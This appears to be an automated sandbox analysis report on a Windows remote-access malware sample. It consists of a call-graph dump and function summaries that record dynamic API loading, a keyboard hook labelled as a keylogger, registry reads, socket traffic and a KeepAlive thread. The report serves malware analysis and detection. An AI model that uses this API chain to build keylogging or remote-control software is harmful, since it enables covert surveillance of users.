404290 47750->47751 47752 4042a5 47750->47752 47758 4042df 22 API calls 47751->47758 47754 4027e6 28 API calls 47752->47754 47757 4042a3 47754->47757 47755 404299 47759 402c48 22 API calls 47755->47759 47757->47724 47758->47755 47759->47757 47761 40b930 47760->47761 47762 40a1d2 47760->47762 47765 40b9a7 28 API calls 47761->47765 47762->47728 47762->47729 47764->47741 47765->47762 47775 40a2f3 47766->47775 47805 40ad11 47769->47805 47847 40a761 47772->47847 47776 40a30c GetModuleHandleA SetWindowsHookExA 47775->47776 47777 40a36e GetMessageA 47775->47777 47776->47777 47780 40a328 GetLastError 47776->47780 47778 40a380 TranslateMessage DispatchMessageA 47777->47778 47779 40a2ab 47777->47779 47778->47777 47778->47779 47790 41bc1f 47780->47790 47796 441ed1 47790->47796 47793 402093 28 API calls 47794 40a339 47793->47794 47795 4052fd 28 API calls 47794->47795 47797 441edd 47796->47797 47800 441ccd 47797->47800 47799 41bc43 47799->47793 47801 441ce4 47800->47801 47803 441d1b __cftoe 47801->47803 47804 44062d 20 API calls _Atexit 47801->47804 47803->47799 47804->47803 47834 40ad1f 47805->47834 47806 40a2cd 47807 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 47808 40b93f 28 API calls 47807->47808 47808->47834 47813 41bb77 GetTickCount 47813->47834 47814 40adbf GetWindowTextW 47814->47834 47816 401f09 11 API calls 47816->47834 47817 40b927 28 API calls 47817->47834 47818 40af17 47819 401f09 11 API calls 47818->47819 47819->47806 47820 40ae84 Sleep 47820->47834 47821 441ed1 20 API calls 47821->47834 47823 402093 28 API calls 47823->47834 47824 40ae0c 47826 409097 28 API calls 47824->47826 47824->47834 47843 40b19f 31 API calls new 47824->47843 47826->47824 47828 403014 28 API calls 47828->47834 47829 406383 28 API calls 47829->47834 47831 40a671 12 API calls 47831->47834 47832 41bcef 28 API calls 47832->47834 47833 401fd8 11 API calls 47833->47834 47834->47806 47834->47807 47834->47813 47834->47814 47834->47816 47834->47817 47834->47818 47834->47820 47834->47821 47834->47823 47834->47824 47834->47828 47834->47829 47834->47831 47834->47832 47834->47833 47835 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 47834->47835 47836 401f86 47834->47836 47840 434801 23 API calls __onexit 47834->47840 47841 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 47834->47841 47842 40907f 28 API calls 47834->47842 47844 40b9b7 28 API calls 47834->47844 47845 40b783 40 API calls 2 library calls 47834->47845 47846 4052fd 28 API calls 47834->47846 47837 401f8e 47836->47837 47838 402252 11 API calls 47837->47838 47839 401f99 47838->47839 47839->47834 47840->47834 47841->47834 47842->47834 47843->47824 47844->47834 47845->47834 47848 40a776 Sleep 47847->47848 47868 40a6b0 47848->47868 47850 40a2c1 47851 40a7b6 CreateDirectoryW 47857 40a788 47851->47857 47852 40a7c7 GetFileAttributesW 47852->47857 47853 401e65 22 API calls 47853->47857 47854 40a7de SetFileAttributesW 47854->47857 47855 4020df 11 API calls 47866 40a829 47855->47866 47857->47848 47857->47850 47857->47851 47857->47852 47857->47853 47857->47854 47857->47866 47881 41c482 47857->47881 47858 40a858 PathFileExistsW 47858->47866 47860 4020b7 28 API calls 47860->47866 47861 40a961 SetFileAttributesW 47861->47857 47862 401fd8 11 API calls 47862->47866 47863 401fe2 28 API calls 47863->47866 47864 406e13 28 API calls 47864->47866 47866->47855 47866->47858 47866->47860 47866->47861 47866->47862 47866->47863 47866->47864 47867 401fd8 11 API calls 47866->47867 47891 41c516 32 API calls 47866->47891 47892 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47866->47892 47867->47857 47869 40a75d 47868->47869 47871 40a6c6 47868->47871 47869->47857 47870 40a6e5 CreateFileW 47870->47871 47872 40a6f3 GetFileSize 47870->47872 47871->47870 47873 40a728 CloseHandle 47871->47873 47874 40a73a 47871->47874 47875 40a716 47871->47875 47876 40a71d Sleep 47871->47876 47872->47871 47872->47873 47873->47871 47874->47869 47878 409097 28 API calls 47874->47878 47893 40b117 84 API calls 47875->47893 47876->47873 47879 40a756 47878->47879 47880 40a1b4 124 API calls 47879->47880 47880->47869 47883 41c495 CreateFileW 47881->47883 47884 41c4d2 47883->47884 47885 41c4ce 47883->47885 47886 41c4f2 WriteFile 47884->47886 47887 41c4d9 SetFilePointer 47884->47887 47885->47857 47889 41c505 47886->47889 47890 41c507 CloseHandle 47886->47890 47887->47886 47888 41c4e9 CloseHandle 47887->47888 47888->47885 47889->47890 47890->47885 47891->47866 47892->47866 47893->47876 47896 40322e 47895->47896 47905 403618 47896->47905 47898 40323b 47898->47716 47900 40326e 47899->47900 47901 402252 11 API calls 47900->47901 47902 403288 47901->47902 47903 402336 11 API calls 47902->47903 47904 403031 47903->47904 47904->47243 47906 403626 47905->47906 47907 403644 47906->47907 47908 40362c 47906->47908 47910 40365c 47907->47910 47911 40369e 47907->47911 47916 4036a6 28 API calls 47908->47916 47914 4027e6 28 API calls 47910->47914 47915 403642 47910->47915 47917 4028a4 22 API calls 47911->47917 47914->47915 47915->47898 47916->47915 47919 404186 47918->47919 47920 402252 11 API calls 47919->47920 47921 404191 47920->47921 47929 4041bc 47921->47929 47924 4042fc 47940 404353 47924->47940 47926 40430a 47927 403262 11 API calls 47926->47927 47928 404319 47927->47928 47928->47252 47930 4041c8 47929->47930 47933 4041d9 47930->47933 47932 40419c 47932->47924 47934 4041e9 47933->47934 47935 404206 47934->47935 47936 4041ef 47934->47936 47937 4027e6 28 API calls 47935->47937 47938 404267 28 API calls 47936->47938 47939 404204 47937->47939 47938->47939 47939->47932 47941 40435f 47940->47941 47944 404371 47941->47944 47943 40436d 47943->47926 47945 40437f 47944->47945 47946 404385 47945->47946 47947 40439e 47945->47947 48008 4034e6 28 API calls 47946->48008 47948 402888 22 API calls 47947->47948 47949 4043a6 47948->47949 47951 404419 47949->47951 47952 4043bf 47949->47952 48009 4028a4 22 API calls 47951->48009 47954 4027e6 28 API calls 47952->47954 47964 40439c 47952->47964 47954->47964 47964->47943 48008->47964 48016 43ab1a 48010->48016 48014 4138ca RegSetValueExA RegCloseKey 48013->48014 48015 4138f4 48013->48015 48014->48015 48015->47268 48019 43aa9b 48016->48019 48018 40170d 48018->47270 48020 43aaaa 48019->48020 48021 43aabe 48019->48021 48025 44062d 20 API calls _Atexit 48020->48025 48023 43aaaf __alldvrm __cftoe 48021->48023 48026 4489d7 11 API calls 2 library calls 48021->48026 48023->48018 48025->48023 48026->48023 48030 41b98a ctype ___scrt_fastfail 48027->48030 48028 402093 28 API calls 48029 414f84 48028->48029 48029->47277 48030->48028 48031->47294 48033 414f33 48032->48033 48034 414f3d getaddrinfo WSASetLastError 48032->48034 48200 414dc1 29 API calls ___std_exception_copy 48033->48200 48034->47322 48036 414f38 48036->48034 48038 404846 socket 48037->48038 48039 404839 48037->48039 48041 404860 CreateEventW 48038->48041 48042 404842 48038->48042 48201 40489e WSAStartup 48039->48201 48041->47322 48042->47322 48043 40483e 48043->48038 48043->48042 48045 404fea 48044->48045 48046 404f65 48044->48046 48045->47322 48047 404f6e 48046->48047 48048 404fc0 CreateEventA CreateThread 48046->48048 48049 404f7d GetLocalTime 48046->48049 48047->48048 48048->48045 48203 405150 48048->48203 48050 41bc1f 28 API calls 48049->48050 48051 404f91 48050->48051 48202 4052fd 28 API calls 48051->48202 48060 404a1b 48059->48060 48061 4048ee 48059->48061 48062 40497e 48060->48062 48063 404a21 WSAGetLastError 48060->48063 48061->48062 48065 40531e 28 API calls 48061->48065 48085 404923 48061->48085 48062->47322 48063->48062 48064 404a31 48063->48064 48066 404932 48064->48066 48067 404a36 48064->48067 48070 40490f 48065->48070 48073 402093 28 API calls 48066->48073 48212 41cb72 30 API calls 48067->48212 48069 40492b 48069->48066 48072 404941 48069->48072 48074 402093 28 API calls 48070->48074 48082 404950 48072->48082 48083 404987 48072->48083 48076 404a80 48073->48076 48077 40491e 48074->48077 48075 404a40 48213 4052fd 28 API calls 48075->48213 48079 402093 28 API calls 48076->48079 48080 41b580 80 API calls 48077->48080 48084 404a8f 48079->48084 48080->48085 48089 402093 28 API calls 48082->48089 48209 421ad1 54 API calls 48083->48209 48090 41b580 80 API calls 48084->48090 48207 420cf1 27 API calls 48085->48207 48093 40495f 48089->48093 48090->48062 48091 40498f 48094 4049c4 48091->48094 48095 404994 48091->48095 48097 402093 28 API calls 48093->48097 48211 420e97 28 API calls 48094->48211 48098 402093 28 API calls 48095->48098 48100 40496e 48097->48100 48102 4049a3 48098->48102 48103 41b580 80 API calls 48100->48103 48105 402093 28 API calls 48102->48105 48106 404973 48103->48106 48104 4049cc 48107 4049f9 CreateEventW CreateEventW 48104->48107 48109 402093 28 API calls 48104->48109 48108 4049b2 48105->48108 48208 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48106->48208 48107->48062 48111 41b580 80 API calls 48108->48111 48110 4049e2 48109->48110 48113 402093 28 API calls 48110->48113 48114 4049b7 48111->48114 48115 4049f1 48113->48115 48210 421143 52 API calls 48114->48210 48117 41b580 80 API calls 48115->48117 48118 4049f6 48117->48118 48118->48107 48214 41b847 GlobalMemoryStatusEx 48119->48214 48121 41b886 48121->47322 48215 4145bb 48122->48215 48126 40dde0 48125->48126 48127 41353a 3 API calls 48126->48127 48129 40dde7 48127->48129 48128 40ddff 48128->47322 48129->48128 48130 413584 3 API calls 48129->48130 48130->48128 48132 4020b7 28 API calls 48131->48132 48133 41bce8 48132->48133 48133->47322 48135 41bb8d GetTickCount 48134->48135 48135->47322 48137 436f10 ___scrt_fastfail 48136->48137 48138 41bb46 GetForegroundWindow GetWindowTextW 48137->48138 48139 40417e 28 API calls 48138->48139 48140 41bb70 48139->48140 48140->47322 48142 402093 28 API calls 48141->48142 48143 40f931 48142->48143 48143->47322 48145 4020df 11 API calls 48144->48145 48146 402f3d 48145->48146 48147 4032a0 28 API calls 48146->48147 48148 402f59 48147->48148 48148->47322 48150 404ab4 48149->48150 48245 40520c 48150->48245 48152 404ac9 ctype 48153 404b40 WaitForSingleObject 48152->48153 48154 404b20 48152->48154 48156 404b56 48153->48156 48155 404b32 send 48154->48155 48157 404b7b 48155->48157 48251 4210cb 54 API calls 48156->48251 48160 401fd8 11 API calls 48157->48160 48159 404b69 SetEvent 48159->48157 48161 404b83 48160->48161 48162 401fd8 11 API calls 48161->48162 48163 404b8b 48162->48163 48163->47322 48165 4020df 11 API calls 48164->48165 48166 404c27 48165->48166 48167 4020df 11 API calls 48166->48167 48173 404c30 48167->48173 48168 43bda0 new 21 API calls 48168->48173 48170 4020b7 28 API calls 48170->48173 48171 401fe2 28 API calls 48171->48173 48172 404ca1 48174 404e26 99 API calls 48172->48174 48173->48168 48173->48170 48173->48171 48173->48172 48175 401fd8 11 API calls 48173->48175 48181 404c84 48173->48181 48269 404b96 48173->48269 48176 404ca8 48174->48176 48175->48173 48177 401fd8 11 API calls 48176->48177 48178 404cb1 48177->48178 48179 401fd8 11 API calls 48178->48179 48180 404cba 48179->48180 48180->47322 48275 404cc3 32 API calls 48181->48275 48184 404e40 SetEvent CloseHandle 48183->48184 48185 404e57 closesocket 48183->48185 48186 404ed8 48184->48186 48187 404e64 48185->48187 48186->47322 48188 404e7a 48187->48188 48277 4050e4 84 API calls 48187->48277 48190 404e8c WaitForSingleObject 48188->48190 48191 404ece SetEvent CloseHandle 48188->48191 48278 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48190->48278 48191->48186 48193 404e9b SetEvent WaitForSingleObject 48279 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48193->48279 48195 404eb3 SetEvent CloseHandle CloseHandle 48195->48191 48196->47322 48197->47322 48199->47322 48200->48036 48201->48043 48206 40515c 102 API calls 48203->48206 48205 405159 48206->48205 48207->48069 48208->48062 48209->48091 48210->48106 48211->48104 48212->48075 48214->48121 48218 41458e 48215->48218 48219 4145a3 ___scrt_initialize_default_local_stdio_options 48218->48219 48222 43f7ed 48219->48222 48225 43c540 48222->48225 48226 43c580 48225->48226 48227 43c568 48225->48227 48226->48227 48228 43c588 48226->48228 48240 44062d 20 API calls _Atexit 48227->48240 48241 43a837 36 API calls 3 library calls 48228->48241 48231 43c598 48242 43ccc6 20 API calls 2 library calls 48231->48242 48232 43c56d __cftoe 48233 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48232->48233 48235 4145b1 48233->48235 48235->47322 48236 43c610 48243 43d334 51 API calls 3 library calls 48236->48243 48239 43c61b 48244 43cd30 20 API calls _free 48239->48244 48240->48232 48241->48231 48242->48236 48243->48239 48244->48232 48246 405214 48245->48246 48247 4023ce 11 API calls 48246->48247 48248 40521f 48247->48248 48252 405234 48248->48252 48250 40522e 48250->48152 48251->48159 48253 405240 48252->48253 48254 40526e 48252->48254 48256 4028e8 28 API calls 48253->48256 48268 4028a4 22 API calls 48254->48268 48258 40524a 48256->48258 48258->48250 48270 404ba0 WaitForSingleObject 48269->48270 48271 404bcd recv 48269->48271 48276 421107 54 API calls 48270->48276 48273 404be0 48271->48273 48273->48173 48274 404bbc SetEvent 48274->48273 48275->48173 48276->48274 48277->48188 48278->48193 48279->48195 48281->47386 48282->47412 48283->47411 48284->47400 48285->47404 48286->47410 48287->47443 48292 40f7fd 48290->48292 48291 413584 3 API calls 48291->48292 48292->48291 48293 40f8a1 48292->48293 48296 40f891 Sleep 48292->48296 48297 40f82f 48292->48297 48295 409097 28 API calls 48293->48295 48294 409097 28 API calls 48294->48297 48299 40f8ac 48295->48299 48296->48292 48297->48294 48297->48296 48298 41bcef 28 API calls 48297->48298 48305 401f09 11 API calls 48297->48305 48308 402093 28 API calls 48297->48308 48312 4137aa 14 API calls 48297->48312 48323 40d0d1 112 API calls ___scrt_fastfail 48297->48323 48324 41384f 14 API calls 48297->48324 48298->48297 48301 41bcef 28 API calls 48299->48301 48302 40f8b8 48301->48302 48325 41384f 14 API calls 48302->48325 48305->48297 48306 40f8cb 48307 401f09 11 API calls 48306->48307 48309 40f8d7 48307->48309 48308->48297 48310 402093 28 API calls 48309->48310 48311 40f8e8 48310->48311 48313 4137aa 14 API calls 48311->48313 48312->48297 48314 40f8fb 48313->48314 48326 41288b TerminateProcess WaitForSingleObject 48314->48326 48316 40f903 ExitProcess 48327 412829 62 API calls 48317->48327 48324->48297 48325->48306 48326->48316 48328 40165e 48329 401666 48328->48329 48330 401669 48328->48330 48331 4016a8 48330->48331 48333 401696 48330->48333 48332 43455e new 22 API calls 48331->48332 48334 40169c 48332->48334 48335 43455e new 22 API calls 48333->48335 48335->48334

                                                                                                Executed Functions

                                                                                                Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                • API String ID: 4236061018-3687161714
                                                                                                • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                                                                                • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE
                                                                                                Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1277 40a2f3-40a30a 1278 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1277->1278 1279 40a36e-40a37e GetMessageA 1277->1279 1278->1279 1282 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1278->1282 1280 40a380-40a398 TranslateMessage DispatchMessageA 1279->1280 1281 40a39a 1279->1281 1280->1279 1280->1281 1283 40a39c-40a3a1 1281->1283 1282->1283
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 5fde2b34a4504e6eea0d3b4781e0e866905567e75789e5425b76f48977b00625
                                                                                                • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                                                                • Opcode Fuzzy Hash: 5fde2b34a4504e6eea0d3b4781e0e866905567e75789e5425b76f48977b00625
                                                                                                • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA
                                                                                                Function 0040F7E2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                                                                                  • Part of subcall function 00413584: RegCloseKey.KERNELBASE(?), ref: 004135CD
                                                                                                • Sleep.KERNELBASE(00000BB8), ref: 0040F896
                                                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 5.2.0 Pro$override$pth_unenc$RG
                                                                                                • API String ID: 2281282204-1448307011
                                                                                                • Opcode ID: 1af1d5829739cdfae1d7ec60a3919f213ddc3876d94f720482a9bc216ddd3272
                                                                                                • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                                                                                • Opcode Fuzzy Hash: 1af1d5829739cdfae1d7ec60a3919f213ddc3876d94f720482a9bc216ddd3272
                                                                                                • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF
                                                                                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1426 404f51-404f5f 1427 404f65-404f6c 1426->1427 1428 404fea 1426->1428 1430 404f74-404f7b 1427->1430 1431 404f6e-404f72 1427->1431 1429 404fec-404ff1 1428->1429 1432 404fc0-404fe8 CreateEventA CreateThread 1430->1432 1433 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1430->1433 1431->1432 1432->1429 1433->1432
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-1507639952
                                                                                                • Opcode ID: 14a91583b2d264a5addeb1b7c1dbb9be3becf486bbdda4e77342a8b9c593ad2f
                                                                                                • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                                                                • Opcode Fuzzy Hash: 14a91583b2d264a5addeb1b7c1dbb9be3becf486bbdda4e77342a8b9c593ad2f
                                                                                                • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00474F08,00404C49,00000000,?,?,?,00474F08,?), ref: 00404BA5
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitrecv
                                                                                                • String ID:
                                                                                                • API String ID: 311754179-0
                                                                                                • Opcode ID: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                                                                • Instruction ID: 0899ded2458b7d4720508400fe02e5f5257555b40415190a6d7bc1514cf1b529
                                                                                                • Opcode Fuzzy Hash: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                                                                • Instruction Fuzzy Hash: 53F05E36108212FFC7019F10EC09E0AFB62FB85721F10862AF510512B08771FC20DB95
                                                                                                Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750F4), ref: 0041B6BB
                                                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
